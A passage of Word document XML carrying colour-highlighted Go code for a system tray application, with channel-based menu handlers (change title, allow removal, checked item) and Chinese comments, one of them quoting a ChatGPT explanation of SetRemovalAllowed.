          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>接受</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> ch </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>出来的事件，来触发对应动作</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mChange</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ClickedCh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>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00000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mChange</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetTitle</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"I've Changed"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mAllowRemoval</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ClickedCh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>:</w:t>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i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>我暂不知道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> SetRemovalAllowed </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>具体用法，没看出效果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>// chatgpt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>回答部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>如果将参数设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>，则表示允许移除系统托盘图标，用户可以通过右键点击图标并选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>退出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>移除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>来移除图标。如果参数设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>，则表示不允许移除系统托盘图标，用户将无法通过右键点击图标来移除。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>通常情况下，如果应用程序需要长时间运行，并且希望保留在系统托盘中，可以将移除图标的选项设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> false</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>，以防止用户误操作移除图标。但如果应用程序是一次性任务或临时任务，并且不再需要运行时，可以将移除图标的选项设置为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>，以便用户可以方便地移除图标。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="8C8C8C"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>SetRemovalAllowed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>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033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">case </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>&lt;-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>mChecked</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
